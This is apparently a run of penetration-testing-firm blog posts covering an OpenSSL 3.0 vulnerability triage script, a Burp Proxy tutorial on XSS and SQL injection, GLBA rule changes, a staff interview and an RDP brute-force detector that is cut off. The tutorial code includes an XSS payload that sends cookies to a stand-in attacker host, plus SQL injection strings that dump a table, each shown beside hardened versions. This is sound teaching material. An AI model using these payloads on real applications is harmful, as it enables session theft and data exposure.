UPDATE: Subsequent to publication of this blog post, the OpenSSL vulnerabilities were assigned CVE-2022-3786 and CVE-2022-3602, OpenSSL released the patch as version 3.0.7, and the threat level was downgraded from “critical” to “high.”
In the cyberworld, news of a critical vulnerability affecting OpenSSL versions 3.0.0 through 3.0.6 will likely be the scariest part of Halloween ’22, especially since the last OpenSSL bug to cause this much alarm was the aptly named “Heartbleed” in 2014.
There is a lot of buzz online about this vulnerability, but here’s what we know for sure:
It really could be that serious. The OpenSSL project management team says it’s critical, and they are not known for crying ‘wolf’ without reason. By the project’s own definition, ‘critical’ means the issue affects common configurations and is likely to be exploitable, for example by leaking the contents of server memory, exposing private keys, or allowing remote code execution.
So, you definitely need to patch. OpenSSL’s software is ubiquitous in the world of security and encryption. Though roughly 98% of instances are still version 1.1.1, the 1.5% running 3.0.x includes some very popular Linux distributions, including Red Hat Enterprise Linux (RHEL) 9.x and Ubuntu 22.04, as well as any application, container image, or appliance that ships its own copy of the 3.0.x library.
And you need to patch ASAP. OpenSSL is making the patch available tomorrow, November 1, between 8 AM and noon U.S. Eastern Time. According to an OpenSSL spokesman, the rationale for announcing the vulnerability before the patch is ready is to give organizations time to identify the systems that need to be patched and assemble the resources necessary to do so.
How can you be sure that all your relevant systems are patched? Installing the updates is only half the job: verify each host afterward, checking the library version actually loaded (not just the package version) and restarting any long-running service that loaded the old library before the update. As always, a Raxis penetration test can also reveal unpatched or out-of-date software from OpenSSL or any other provider. What’s more, our team can show you proof of what assets are at risk and why.
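As an added example (not code from the original post), the following Python script classifies an `openssl version` banner against the affected range and lists the running processes that still have an OpenSSL 3 library mapped, which is the set of services that need a restart after the package upgrade. The banner strings are constructed for this example. One caveat: distributions often backport the fix without changing the version number (a patched Ubuntu package can still report 3.0.2), so treat the banner check as a first pass and confirm against your distribution’s advisory or the package changelog.

```python
"""Added example, not from the original post: triage a host for the OpenSSL 3.0
X.509 bugs (CVE-2022-3602 / CVE-2022-3786). Affected: 3.0.0 through 3.0.6;
fixed in 3.0.7. 1.1.1 and 1.0.2 are not affected. Sample banners are constructed."""
import re
import subprocess
from pathlib import Path
from typing import Dict, Optional, Set, Tuple

AFFECTED_LOW = (3, 0, 0)
AFFECTED_HIGH = (3, 0, 6)       # inclusive; 3.0.7 carries the fix

_BANNER_RE = re.compile(r"OpenSSL\s+(\d+)\.(\d+)\.(\d+)")


def parse_version(banner: str) -> Optional[Tuple[int, int, int]]:
    """(major, minor, patch) from e.g. 'OpenSSL 3.0.2 15 Mar 2022'.
    The letter suffix of 1.1.1n is ignored; it never changes the branch."""
    m = _BANNER_RE.search(banner)
    return tuple(int(x) for x in m.groups()) if m else None


def is_affected(banner: str) -> bool:
    """True when the banner reports a version inside the affected range.
    Caveat: distributions backport fixes without bumping the version string,
    so True here means 'check the package changelog', not 'exploitable'."""
    v = parse_version(banner)
    return v is not None and AFFECTED_LOW <= v <= AFFECTED_HIGH


def processes_with_openssl3() -> Dict[int, Set[str]]:
    """PIDs that have libssl.so.3 or libcrypto.so.3 mapped (Linux /proc).
    Upgrading the package does not fix a service that loaded the old copy
    before the upgrade; those processes have to be restarted. Vendored or
    statically linked copies (containers, appliances) will not show up here."""
    found: Dict[int, Set[str]] = {}
    for maps in Path("/proc").glob("[0-9]*/maps"):
        try:
            text = maps.read_text()
        except OSError:            # process exited, or not ours to read
            continue
        libs = set(re.findall(r"\S*lib(?:ssl|crypto)\.so\.3\S*", text))
        if libs:
            found[int(maps.parent.name)] = libs
    return found


def audit_host() -> dict:
    """Banner of the default openssl binary plus the live library users."""
    try:
        proc = subprocess.run(["openssl", "version"], capture_output=True,
                              text=True, check=False)
        banner = proc.stdout.strip()
    except FileNotFoundError:
        banner = ""
    return {"banner": banner,
            "banner_affected": is_affected(banner),
            "openssl3_processes": processes_with_openssl3()}


# Constructed banners for a quick self-check when run directly.
SAMPLE_BANNERS = [
    "OpenSSL 3.0.2 15 Mar 2022",
    "OpenSSL 3.0.7 1 Nov 2022",
    "OpenSSL 1.1.1n  15 Mar 2022",
]

if __name__ == "__main__":
    for b in SAMPLE_BANNERS:
        print(f"{b!r}: affected={is_affected(b)}")
    print(audit_host())
```

Run it on each host (or wrap it in your fleet tool of choice); a non-empty `openssl3_processes` after the upgrade is the list of services to bounce.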
At Raxis, we believe that great relationships lead to excellent results. As a team of highly skilled engineers, we’re on a mission to provide our customers with real life breach analyses that helps them plug vulnerabilities and create a more secure environment. We’re the firm of choice for companies that are looking for cybersecurity assessments from a firm that delivers on its promise.
As we work closely with our clients to bolster their cybersecurity, we’re always happy to hear from them about their impressions of our work and how well we were able to help them improve security. With that in mind, we’re delighted to have acquired our first-ever 5-star review on Clutch.
For context, Clutch is a B2B ratings and reviews platform dedicated to publishing helpful content about their registered providers. The team of analysts collects and evaluates feedback from buyers that have worked with these service providers. Clutch guarantees that each review it publishes is unbiased and accurate.
Our first review comes from a background screening company. Our ongoing relationship with the client began in 2015. They engaged with us for auditing services, vulnerability assessments, security analysis, and penetration testing services. Since we’ve started working together, we’ve proven to them that we deliver high-quality results on time, every time. The client has expressed their satisfaction with us meeting — and many times exceeding — expectations. That’s because our focus is on their real needs, not our own preferences.
“I consider their focus — specifically in terms of penetration testing — to be an incredible strength of theirs. Raxis’ resources and methodologies are built around testing, security, and all other aspects associated with these things. Their members are skilled, extremely passionate, and dedicated to their work.”
CISO, Background Screening Company
We’re truly honored to hear the positive sentiments from our client because it means we’re addressing the real need — keeping them secure — and not simply checking boxes.
Don’t forget to read the full review on our Clutch profile to learn more about this project. Also, we’re listed on The Manifest as a top 100 cybersecurity company in Atlanta. The Manifest is Clutch’s sister site that focuses on highlighting vendors’ most notable projects.
If you’re interested in working with our team, please send us an inquiry, and we’ll set up a conversation to see how we can help you.
People are often surprised to find that a hacker doesn’t only attack a website through the authentication process. Our team members are experts at demonstrating why just enforcing password policies and lockout times doesn’t fully protect applications.
In this article, we’re going to pull back the curtain and show you how hackers use web proxy tools to help exploit applications in ways you might never expect.
How the Proxy Tool Works
A web proxy tool sits between your browser and the application server and lets you see, hold, and change every request before it is sent on. Several such tools exist, but Burp Proxy (included in all versions of Burp Suite) is one of the most popular. Using Burp Proxy, hackers can bypass the user interface, the page you see when entering data, and change the information after the browser has finished with it but before it reaches the application server. This makes it possible to avoid client-side controls, such as JavaScript that checks that a phone number is only numeric or that an email address is formatted correctly. If the server code assumes those client-side controls have already validated the data, it may not have the proper protections in place itself.
In the image below, Burp Proxy, in “Intercept” mode, holds each request on its way from your device to the application server. The user can edit the intercepted request and then forward it, one request at a time. If security features are built into the client (the interface you see) but not present on the application server, the proxy enables hackers to enter compliant data first, then change it however they want before it reaches the server.
One example of how hackers exploit this setup involves the buttons and checkboxes found in many apps. Most developers are cautious about free-text input fields, but because buttons, checkboxes, and radio buttons appear to limit data entry to “on-off” or “yes-no” choices, they often see little inherent risk. The problem is that, even though the options are limited at the interface (client-side), the value that actually arrives may not be limited by the code on the server itself (server-side): nothing stops an intercepted “on” from becoming any string the attacker likes.
How a Proxy Tool can Reveal a Vulnerability
The three illustrations below show how even a simple “submit” button can present opportunities for hackers.
The choice here seems straightforward — either you click the button or you do not. But that choice masks what happens after you click “submit.”
“Submit” is really just a request being sent to the server. Here, using Burp Proxy to intercept the data, we can see the request as it will appear to the application server.
Now, rather than a simple yes-or-no choice, the user can modify the request any way they like and send it on to the server by clicking “Forward.”
How Hackers Turn the Exploit into an Attack
With the ability to effectively bypass safeguards on the client-side interface, hackers can send information directly to the application server. Here are a couple of examples of the types of attacks they can execute if the application server is not secure. (For clarity, we’ll use text-based fields, rather than check-boxes in these examples.)
Example 1: Cross-Site Scripting (XSS)
Cross-site scripting (XSS) injects malicious client-side code into web application parameters so that the application includes it in its output and the victim’s browser executes it. In a reflected attack the payload comes straight back in the response to the request that carried it; in a stored attack, such as a guestbook entry, the application saves the payload and serves it to every later visitor. Because the script arrives from a site the user trusts, the browser runs it with that site’s privileges, permitting the attacker to take actions on the user’s behalf within the application, such as reading cookies and session tokens as well as other sensitive data. (Adapted from the Raxis Glossary.)
The following walk-through demonstrates how a simple guestbook submission form request works normally and then how an attacker can use a web proxy to insert malicious code.
This is the submission form as it appears to users:
Our Burp Proxy tool reveals the actual request sent to the application server:
Here the attacker enters an innocuous submission that passes the client-side input checks:
And now the attacker captures the entry using Burp Proxy:
Before allowing the proxy tool to move to the next step, the attacker replaces the original harmless data with a malicious script:
The application server, without server-side controls to stop it, accepts the script and returns the payload to the browser. This is what the attacker sees in Burp Proxy:
And here we see the successful cross-site scripting result in the browser:
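The following Python handler, added here as an example and not taken from the original post, shows the server side of both situations described above: the guestbook comment field from this walk-through, and the checkbox case from the earlier section (a control a browser would only ever send as `on`). Both versions take the raw POST body, which is what Burp Proxy lets the attacker rewrite, so any client-side validation has already been left behind by the time these functions run. The field names, the sample bodies and the host `attacker.example` are constructed for this example.

```python
"""Added example (not the original post's code): a guestbook submission handler
before and after server-side controls. Each function takes the raw POST body
that an intercepting proxy lets the attacker edit, so whatever JavaScript
checked the form in the browser is irrelevant here."""
from html import escape
from urllib.parse import parse_qs

MAX_COMMENT = 500
EXPECTED_FIELDS = {"comment", "public"}


def render_vulnerable(body: str) -> str:
    """Trusts the request to look the way the form would have sent it:
    the comment is concatenated straight into HTML and the checkbox value
    is copied into an attribute as-is."""
    form = parse_qs(body, keep_blank_values=True)
    comment = form.get("comment", [""])[0]
    public = form.get("public", [""])[0]
    return f'<li data-public="{public}">{comment}</li>'


def render_hardened(body: str) -> str:
    """Re-validates every field on the server, then encodes for the HTML
    context it lands in. Raises ValueError for anything a real browser
    submission of this form could not have produced."""
    form = parse_qs(body, keep_blank_values=True)
    if set(form) - EXPECTED_FIELDS:
        raise ValueError("unexpected form field")
    comment = form.get("comment", [""])[0]
    if not 0 < len(comment) <= MAX_COMMENT:
        raise ValueError("comment length out of range")
    public_vals = form.get("public", [])
    # A checkbox is either absent or sent exactly once with the value 'on'.
    if public_vals and public_vals != ["on"]:
        raise ValueError("checkbox value tampered with")
    public = "true" if public_vals else "false"
    # quote=True also encodes ' and ", so the same call is safe for an
    # attribute value, not only for element text.
    return f'<li data-public="{public}">{escape(comment, quote=True)}</li>'


def rejects(body: str) -> bool:
    """True if the hardened handler refuses the body."""
    try:
        render_hardened(body)
    except ValueError:
        return True
    return False


# Constructed request bodies: what the form sends, then two proxy-edited versions.
NORMAL_BODY = "comment=Great+site%21&public=on"
XSS_BODY = ("comment=%3Cscript%3Edocument.location%3D%27https%3A%2F%2Fattacker.example"
            "%2F%3F%27%2Bdocument.cookie%3C%2Fscript%3E&public=on")
CHECKBOX_BODY = "comment=hi&public=%22%3E%3Cimg+src%3Dx+onerror%3Dalert(1)%3E"

if __name__ == "__main__":
    for name, body in [("normal", NORMAL_BODY), ("xss", XSS_BODY),
                       ("checkbox", CHECKBOX_BODY)]:
        print(name, "vulnerable ->", render_vulnerable(body))
        print(name, "hardened   ->",
              "REJECTED" if rejects(body) else render_hardened(body))
```

The two fixes are independent: output encoding stops the script in the comment, and the allowlist on `public` stops the checkbox value from being turned into an attribute-context injection. Neither depends on anything the browser did.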
Example 2: SQL Injection (SQLi)
In this attack, SQL syntax is injected into the application via input parameters so that it becomes part of the query the server runs. A successful attack could read sensitive data from the database, modify data in the database, execute operations on the database (including administrative operations), read files from the DBMS file system, or, in some configurations, issue commands to the operating system. (Adapted from the Raxis Glossary.)
Here we demonstrate how a user ID field can be manipulated to enable a SQLi attack.
We start with a simple user ID entry field with a submit button where we enter a name and submit:
Again the attacker intercepts the submission using Burp Proxy en route to the application server.
As in the XSS example, the attacker then modifies the value in Burp Proxy, this time closing the string with a quote character and appending a SQL fragment of their own:
With no server-side controls in place to stop the attack, the server returns the data requested in the SQL database query. This is what the attacker sees in Burp Proxy:
And here we see the successful SQL injection result in the browser:
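As an added example (not code from the original post), here is the user-ID lookup behind this walk-through in its injectable and parameterised forms, run against an in-memory SQLite table with constructed rows. The two payloads are the kind of value an attacker would forward from Burp Proxy in place of a plain user name; the table, column names and rows are assumptions for the example.

```python
"""Added example (not the original post's code): the user-ID lookup behind the
walk-through, in its injectable and parameterised forms, against an in-memory
SQLite table with constructed rows."""
import sqlite3
from typing import List, Tuple


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, "
        "email TEXT, api_key TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, email, api_key) VALUES (?, ?, ?)",
        [("alice", "alice@example.com", "key-alice"),
         ("bob", "bob@example.com", "key-bob"),
         ("carol", "carol@example.com", "key-carol")],
    )
    return conn


CONN = make_db()


def lookup_vulnerable(username: str) -> List[Tuple[str, str]]:
    """Builds the statement by string concatenation, so the request value is
    parsed as SQL. This is the server the walk-through attacks."""
    sql = "SELECT username, email FROM users WHERE username = '" + username + "'"
    return CONN.execute(sql).fetchall()


def lookup_hardened(username: str) -> List[Tuple[str, str]]:
    """Binds the value as a parameter: the driver sends it as data, so a quote
    in the input can never end the string literal or start a new clause."""
    return CONN.execute(
        "SELECT username, email FROM users WHERE username = ?", (username,)
    ).fetchall()


# Constructed payloads. The first turns the WHERE clause into a tautology;
# the second uses UNION to pull a column the page was never meant to show.
TAUTOLOGY = "' OR '1'='1"
UNION_DUMP = "x' UNION SELECT username, api_key FROM users --"

if __name__ == "__main__":
    for label, value in [("normal", "alice"), ("tautology", TAUTOLOGY),
                         ("union", UNION_DUMP)]:
        print(label, "vulnerable ->", lookup_vulnerable(value))
        print(label, "hardened   ->", lookup_hardened(value))
```

With the tautology the vulnerable query returns every row; with the UNION payload it returns API keys, a column the page never selects, because the trailing `--` comments out the quote the server appended. The parameterised version returns nothing for either payload, since no user is literally named `' OR '1'='1`.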
Summary
It’s tempting here to focus on the Burp Proxy tool and its capabilities, but the more important point is to recognize that vulnerabilities can exist in places we as users might not think. Something that seems innocuous, like a simple submit or on/off button, can be manipulated by a hacker with relative ease. The same is true for any field, button, or widget that sends a request to an application server.
Remember that the mindset of a hacker is always to look at something as it’s expected to be used, then attempt to use it differently. That’s why pentesting by skilled professionals is so important. It takes trained, ethical hackers to prevent the work of their malicious counterparts.
Would you like to learn how Raxis can help your organization? Reach out. We have a guaranteed, no-pressure approach, and – after all – we’re all on the same side.
After years of development and public input, the Federal Trade Commission (FTC) in December finalized some changes to the Standards for Safeguarding Customer Information (Safeguards) Rule – a key part of the Gramm-Leach-Bliley Act (GLBA).
Of the four major rule changes, one simply adds a new category of business under the definition of “financial institution,” another exempts institutions that maintain information on fewer than 5,000 consumers from some of the new requirements, and a third standardizes some terminology across agencies.
Though all of these are important for various reasons, the most significant changes from Raxis’ perspective are the ones that more clearly define the elements of the information security programs required by GLBA and which ensure better accountability for implementing and testing such programs.
The Problems
In the past, the federal government was reluctant to be overly prescriptive with its cybersecurity requirements. The prevailing mindset was that a detailed checklist would reduce compliance to rote activity and invite complacency. Flexibility, the thinking went, was necessary so that institutions were free to adopt the practices that offered the best protection for their company or niche.
The reality we’ve witnessed during more than a decade of Raxis penetration testing is that the level of cybersecurity awareness and sophistication can vary wildly among financial institutions, regardless of size or business model. Ambiguity in the regulations allowed a patchwork of cybersecurity measures to emerge under the general umbrella of compliance. It was clear to our team that the Safeguards Rule needed to be more specific to make sure all the institutions were implementing the most basic best practices.
Lack of specificity in the prior iterations of the rules also made it harder for regulators and the institutions themselves to know whether their infosec programs were effective. Along with more specifics, the institutions needed stronger accountability measures.
The Improvements
Toward the goal of greater accountability, the Safeguards Rule added two important provisions: Designation of a single “qualified individual” to act as a de facto chief information security officer (CISO) to manage the infosec program and a requirement that he or she report to the company’s board. Most institutions have those functions covered in some form or fashion, but we’ve seen instances where responsibilities were split among employees and even departments.
Having a qualified infosec leader in place is a good first step toward consolidating authority, but more important is how well and how quickly the institutions adopt the following changes to the Safeguards Rule:
Review of access controls. This change requires institutions to regularly test digital and physical access to customer data to make sure only authorized personnel can see it, and that they see only the parts of it necessary to do their jobs. If a Raxis team member successfully breaches your network during a test, you can bet we will check to see whether you’ve followed the principle of least privilege.
Inventory of key data and systems. The inventory process ensures that institutions know what they are protecting with their infosec program. As we discussed in a prior post, it’s not always obvious what data and what systems are at risk.
Intrusion detection. This change requires annual penetration testing and vulnerability assessments at least every six months for companies that do not continuously monitor their networks. Raxis offers all of these services, but we don’t believe they should be presented as either/or choices: continuous monitoring or a vulnerability assessment should trigger a pentest whenever serious vulnerabilities are discovered.
Secure application development. With this rule change, the FTC outlines some best security practices for in-house and third-party app development. As we explained in some recent posts, public-facing web applications face some unique security challenges, and it’s good that the FTC understands the seriousness of that issue.
Incident response planning. This update simply requires that institutions develop written plans for responding to security incidents and includes information about what those plans should cover.
Encryption requirement. This may seem like a no-brainer, but the Safeguards Rule now requires encryption of data in transit and at rest. But it also provides for the ability of the “qualified individual” to authorize an acceptable alternative if encryption isn’t feasible.
Multifactor authentication (MFA) requirement. Again, this would appear to be table stakes for a financial institution, but based on Raxis’ experience, it has not been adopted nearly as widely as it should have been already. The rule change, we hope, will make MFA a standard practice industrywide.
Change management procedures. These outline the steps financial institutions should take when they alter their infosec programs. As a security measure, this ensures such changes are documented and approved beforehand.
This is just a snapshot of what Raxis considers the FTC’s most impactful changes to the GLBA Safeguards Rule. Like all such regulations, they should all be viewed by the institutions as minimum guidelines, not as a safe harbor or assurance of security. Similarly, regulators should judge compliance not by whether the boxes have been checked, but by how thoroughly the institutions have prepared themselves for the attacks that are coming.
There is no finish line in cybersecurity, but these changes will give all US financial institutions a head start on better protection for their customers.
To read the full Safeguards Rule as finalized, be sure to visit the Federal Register.
I’m Brad Herring, VP of business development for Raxis. In that role, I work very closely with our marketing specialist on a near-daily basis. So, our interview was more like an extension of our normal conversations. And that’s one of the great things about working with Raxis – we’re a tight-knit team. We’re professionals who are also friends and family-of-choice. If that sounds like a work environment you’d enjoy, please subscribe to our YouTube channel and check our careers page to learn more.
Jim: Brad, in many cases, you’re the first Raxis team member customers interact with. That seems like it would be incredibly hard.
Brad: Actually, it’s one of my favorite parts of the job.
Jim: I meant for the customers.
Brad: Ha! Yes, for them I’m sure it’s very hard. But once they’re done with me, they get to deal with Tim (Semchenko) and our engineers. So, there’s light at the end of that tunnel.
Jim: Raxis has a lot of new and repeat business, so I’m obviously joking. Tell us more about why you enjoy working with customers and potential customers.
Brad: It’s because I know that we’re genuinely helping them become more secure and, by extension, making the world a little bit better place. I know that sounds hokey, but it really is true.
Jim: You’re doing sales, but that’s not really your background. How did you land in this role?
Brad: I really enjoy telling the story about how our CEO, Mark Puckett, has been a friend since childhood. We’ve always shared a love for computers and cars. After he founded Raxis, he asked for my take on a different business venture he was considering. He decided against that opportunity, but Mark told me that he thought I would be a good fit for Raxis. I said, “Anything but sales.”
Jim: Yet, here you are!
Brad: That goes to show how good Mark is at selling.
Jim: But you are a storyteller at heart and you have a strong technical background as well.
Brad: Yes, my background is in theater. My actual major at Kennesaw State was in Acting and Directing. (I also minored in business law, just to keep people guessing.) And, believe it or not, storytelling is a lot of what I do when I’m speaking with customers. I never know how much technical knowledge someone is bringing to the table, so I have to be sure I understand the technical parts of our job well enough to explain it to people who have little or no expertise on the subject.
Jim: But you also have to work with CIOs and CISOs who live and breathe this stuff.
Brad: Yes, I do. And that’s where I’m fortunate that much of my theater career was spent in the more technical realms of sound and lighting. I owned two companies and did a lot of work for theaters, both indoor and outdoor, as well as houses of worship. A lot of that work is computer-driven, and the technology is based on network protocols.
Jim: I’m sensing that your early love of computers helped pull you in the technical direction, at least in part.
Brad: Absolutely! My first computer was an old Commodore VIC-20 with no storage media. So, if you wanted to play a game, for example, you had to type in pages of commands from books, debug them, hope the power didn’t go out, and then watch all that work disappear when you switched it off. I remember digital cassette recorders as life-changing technology. Then modems came along and gave guys like Mark and me an opportunity to share our passion and connect with others. And, really, those computer-to-computer connections were the origin of the Internet and the main reason why penetration testing is so necessary now.
Jim: What does a typical day at work look like for you?
Brad: You know me. Nothing about me or my work is ever ‘typical’ — and I wouldn’t have it any other way. I do spend a lot of time negotiating with customers — again, making sure that we’re selling them what they need. I’m also involved, as you know, in marketing our services. I still enjoy production work, creating videos that showcase our talented team members, and checking in with other company leadership to make sure we’re on the same page.
Jim: You also have a lot of projects around the house to keep you busy, right?
Brad: My home and property are projects. In fact, sometimes it seems like my life is a project. We have chickens and a garden to tend. I just got done rebuilding an antique tractor that our CTO, Brian Tant, gave me. There are boats to tinker with, a jeep to keep alive, and a lot of carpentry and metal work that keeps me busy.
Jim: And you still have time for your faith and your family.
Brad: Yes. Those are the most significant treasures in my life, and I’m very fortunate that Raxis gives me the flexibility and time I need to nurture them. I’m also privileged to work for the ‘good guys’ in this world and help my children understand the importance of standing up for what’s right. Ultimately, I think that’s what determines whether or not a job is fulfilling and worthwhile — I know that the world is a better place because Raxis is here.
One thing that sets Raxis apart is that our pentesting team is made up of engineers who performed varying roles creating and supporting IT systems before they became pentesters. This includes several engineers who have strong backgrounds in software and web development.
Even better, Raxis is proud to have a close-knit team of pentesters who collaborate and share their ever-growing knowledge with each other and with our customers. You may have a former web developer performing your test, and that person can easily reach out to a former network admin. Together they can share information about the most secure web app features as well as how the supporting network should be configured securely.
Our customers repeatedly tell us how much they appreciate this because it directly translates to relevant, actionable findings. It also encourages natural conversation between their development teams and the security engineers here at Raxis.
How does this collaboration help customers?
A recent test we conducted provides a great example: We identified several findings, and the customer was very pleased with the process. Upon follow-up, our sales team found out that the customer saw a small performance reduction after implementing our recommendations. From the customer’s perspective, enhanced security was worth the small drop in performance.
Because of our development background, however, Raxis’ team members knew that didn’t have to be the case. Our project manager proactively set up a call with the customer to discuss. Result: The customer remediated using Raxis’ advice and regained all of the original performance. They told us they appreciated how Raxis “went the extra mile.”
To us, that’s just business as usual.
How many application tests do we do?
Customers often ask about our application testing process. Application testing accounts for over 50% of our penetration tests. Last year, we performed over 600 application tests. Like all of our assessments, each test is custom tailored to the customer’s application and overall objectives. This could mean testing the entire app, a portion of the app, or following the app throughout the entire development cycle.
What is your methodology?
Like all of our assessments, our application tests are primarily manual attack simulations against a customer’s application. Where you see an email field, we see an opportunity for cross-site scripting. Aside from our own experience and expertise, Raxis applies the OWASP framework to our penetration testing, including (though, of course not limited to) the following assessment categories:
Access Control
Authorization and Authentication
Session Management
Configuration Management
Error Handling
Sensitive Data Exposure
Input Validation, Injection and Cross-Site Scripting
Root Cause Analysis / Reporting
So, what do I get out of this?
At the end of a Raxis application assessment you get peace of mind and a solid deliverable. Our reports align with the NIST standard, so they meet regulatory compliance standards. The reports feature an executive summary, engagement storyboard (where applicable), and detailed vulnerability findings that include screenshots, risk explanations, remediation recommendation, and risk scoring.
Is your web app security keeping you awake at night?
We understand. Just as we are known for excellence in pen testing, we’re also known for our no-pressure sales and scoping process. We get it. We don’t like to be harassed, and we know you don’t either. If you’d like to start a conversation with one of our experts to help understand the possibilities for your project, feel free to reach out. We’d love to help.
To me, the scariest movies are ones where the ghost/monster/alien turns out to be someone we’ve come to know and trust. The same thing is often true with cyberthreats – the people who can do the most damage to your organization, whether intentionally or not, are your own employees. During Raxis red team engagements, company employees are one of the most reliable ways we have to gain access to the corporate network.
Believe me, after thousands of penetration tests over the years, Raxis has lots of stories – and I intend to tell some.
Next Wednesday, our friends at Curricula, an Atlanta-based cybersecurity training company, will launch their first annual “Curriculaville” remote cybersecurity summit. The free, one-day event starts at 11 AM and will feature a number of experts from the information security space. I’m proud to represent the Raxis team as part of a panel discussion entitled, “Scary Security Stories” that will begin at 1 PM.
This is the time of year for tales that send chills up your spine and raise goosebumps on your skin. If you haven’t trained your employees properly and put effective cyber defenses in place, well . . . let’s just say you might be in for quite a fright.
The good news is that Raxis stories usually have happy endings. We might steal some passwords and take over your domain, but 99% of the time, we leave your soul intact. And, we’ll show you how to avoid the real bad guys who will take that and more if they can.
Please check out the link and sign up for this informative, educational event at Curriculaville. After all, hearing our scary stories might just keep you from living one of your own.
When it comes to pen testing, it’s easy to get confused about the differences between an external network pen test and a web application pen test.
In this video, I sit down – via Zoom – with Chief Operating Officer Bonnie Smyre to discuss the differences between the two.
Here’s a quick overview of the two tests.
What is an external pen test?
An external network penetration test is fairly broad and looks at the overall corporate cybersecurity environment. It is an attempt to find all the ways someone could get into your network without having any type of access. Testers look for any gaps they can find and explore ways they might exploit them.
What is a web application pen test?
A web application pen test is much more focused on the application itself, exploiting it in ways that were never considered during development. For example, testers will log in with accounts at different privilege levels and try to reach areas of the application those accounts should not be able to see, while also searching the application for any other vulnerabilities.
So which pen test do you need? Hopefully, the answer is much clearer now. If you have a web application and you want to vet it thoroughly, you need the web application pen test. If you are looking for any vulnerability that might give a hacker access to your data, you should consider the external pen test.
One of the many advantages to having a third party like Raxis come in and test is that it offers you a new perspective and a fresh set of eyes. Raxis testers come in with no expectations other than information they want.
A Raxis penetration test will assess your security posture using a combination of tools, techniques and mischief in pursuit of gaining full control of your network. But Raxis doesn’t stop there. Once weaknesses are found, the Raxis team is here to help you make corrections and secure your network. Find out more about our pen testing experience, or contact us to learn more.
Armed with nothing more than an ordinary can of cool, compressed air, a hacker can gain entry to a key-card-only access facility in just 19 seconds. Skeptical? See for yourself in this video.
Fortunately, the guy in this video is me. Our company, Raxis, is a team of ethical hackers and penetration testing experts who evaluate and identify solutions that help businesses safeguard their sensitive data, from healthcare to finance to innovative product and app development.
Some folks forget that physical security is the first line of defense against a cyberattack. If someone can get inside your business, they can find your servers, and in seconds they can steal, sell, and destroy data you’ve invested thousands in protecting.
Our cybersecurity specialists have studied for years to find hidden, unscrupulous techniques that the world’s most sophisticated hackers use. Solving these puzzles and preventing cyberattacks is what we love to do – but often we find security vulnerabilities long before we get to delve deep.
Finding a failure in your company’s security isn’t something to fear; it’s something to fix. And you can only fix something when you know it is broken.
Follow us on this blog or social media and we’ll share more ways that hackers can get in — and how we can help you keep them out.
Most of us understand by now (hopefully) that this COVID-19 emergency is not the time to take chances with our health and safety. The benefits of being disease free far outweigh the costs of some social distancing and extra diligence about hygiene. However, I’m worried that many companies don’t seem to make the connection between what they’re doing to protect their employees and what they should be doing to protect their data.
That’s dangerous because hackers are heartless. In their world, COVID-19 doesn’t bring suffering and death; to them, it’s all about opportunity and wealth. Like a virus, they’re attacking the most vulnerable and leaving untold damage in their wake.
Unfortunately, we’ve seen and heard about companies across America that are making hackers’ jobs easier. For example, the additional strain of accommodating remote workers has caused many IT departments to open ports and grant access that they would never allow normally.
RDP, VPN, oh my!
One common problem is companies opening remote desktop protocol (RDP) access directly to the internet, where it is a frequent target for brute-force and exploitation attempts. Others have VPN configuration errors that slow network traffic, frustrate users, and put pressure on IT staff to relax security measures in order to improve productivity. And some are not monitoring network traffic or authentication logs at all, which means a brute-force attack against those exposed services can run for days unnoticed. Raxis is seeing this firsthand in many of the external and remote internal penetration tests we are currently conducting for our customers.
Add to this the challenge of team members accessing the network with their home devices. Each one brings with it a high degree of risk that most office-based IT teams aren’t accustomed to managing at scale.
The bad guys know all this, of course. That’s why we’ve seen a surge of attacks, many based on the COVID-19 emergency itself. Scammers know we’re scared, tired, and worried for ourselves and our loved ones. We’re more likely to click on a malicious link or reveal sensitive information – and less likely to have appropriate safeguards in place when we do.
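As an added example (not from the original post), here is the kind of monitoring that closes the door described above: a small Python detector run over constructed log lines written in a simplified form of a Windows Security event (EventID 4625 is a failed logon; logon type 10, RemoteInteractive, is what an RDP attempt produces). The line format, the thresholds and the IP addresses are assumptions for this example; a real deployment would read the events from the Security event log or a SIEM rather than from a list of strings.

```python
"""Added example, not from the original post: flag RDP brute-force and
password-spray sources from failed-logon events. Log lines are constructed
in a simplified form of a Windows Security event (4625 = failed logon,
LogonType 10 = RemoteInteractive, i.e. RDP); thresholds are assumptions."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta
from typing import Dict, Iterable, Optional

LINE_RE = re.compile(
    r"(?P<ts>\S+) EventID=(?P<event>\d+) SourceIP=(?P<ip>\S+) "
    r"User=(?P<user>\S+) LogonType=(?P<ltype>\d+)"
)
FAIL_THRESHOLD = 5             # failures from one source ...
WINDOW = timedelta(minutes=2)  # ... within this long = brute force
SPRAY_USERS = 3                # one source, this many distinct accounts = spray


def parse_event(line: str) -> Optional[dict]:
    """Fields of one constructed log line, or None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%dT%H:%M:%SZ")
    return ev


def detect_rdp_bruteforce(lines: Iterable[str]) -> Dict[str, str]:
    """Return {source_ip: reason} for sources that either reach
    FAIL_THRESHOLD failed RDP logons inside WINDOW or fail against
    SPRAY_USERS different accounts. Successful logons (4624) and
    non-RDP logon types are ignored."""
    recent: Dict[str, deque] = defaultdict(deque)   # ip -> failure timestamps
    accounts: Dict[str, set] = defaultdict(set)     # ip -> user names tried
    alerts: Dict[str, str] = {}
    for line in lines:
        ev = parse_event(line)
        if not ev or ev["event"] != "4625" or ev["ltype"] != "10":
            continue
        window = recent[ev["ip"]]
        window.append(ev["ts"])
        while window and ev["ts"] - window[0] > WINDOW:
            window.popleft()               # drop failures older than WINDOW
        accounts[ev["ip"]].add(ev["user"])
        if len(window) >= FAIL_THRESHOLD:
            alerts[ev["ip"]] = f"{len(window)} failed RDP logons within {WINDOW.seconds}s"
        elif len(accounts[ev["ip"]]) >= SPRAY_USERS:
            alerts[ev["ip"]] = f"password spray across {len(accounts[ev['ip']])} accounts"
    return alerts


# Constructed sample: a user who mistyped twice then succeeded, a brute-force
# source, a slow password spray, a local (non-RDP) failure, and junk.
SAMPLE_LOG = [
    "2020-04-02T09:00:00Z EventID=4625 SourceIP=192.0.2.5 User=jsmith LogonType=10",
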